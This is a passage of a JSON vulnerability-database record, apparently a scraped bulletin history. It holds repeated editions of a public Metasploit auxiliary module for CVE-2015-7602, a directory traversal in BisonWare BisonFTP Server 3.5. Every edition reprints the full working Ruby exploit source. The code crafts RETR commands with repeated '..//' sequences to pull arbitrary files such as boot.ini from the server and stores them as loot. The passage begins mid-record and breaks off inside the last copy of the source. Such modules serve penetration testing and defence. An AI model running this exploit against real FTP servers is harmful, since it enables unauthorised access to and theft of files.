"https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-05-09T17:03:32", "differentElements": ["modified", "published"], "edition": 26}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-05-09T19:01:19", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-05-09T19:01:19", "differentElements": ["modified", "published"], "edition": 27}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-05-11T01:04:59", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-05-11T01:04:59", "differentElements": ["modified", "published"], "edition": 28}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-05-11T05:04:18", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-05-11T05:04:18", "differentElements": ["modified", "published"], "edition": 29}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-05-29T23:50:53", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-05-29T23:50:53", "differentElements": ["modified", "published"], "edition": 30}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-05-30T01:47:53", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-05-30T01:47:53", "differentElements": ["modified", "published"], "edition": 31}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-06-04T13:48:05", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-06-04T13:48:05", "differentElements": ["modified", "published"], "edition": 32}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-06-04T15:50:02", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "objectVersion": "1.4", "metasploitReliability": "Normal", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n 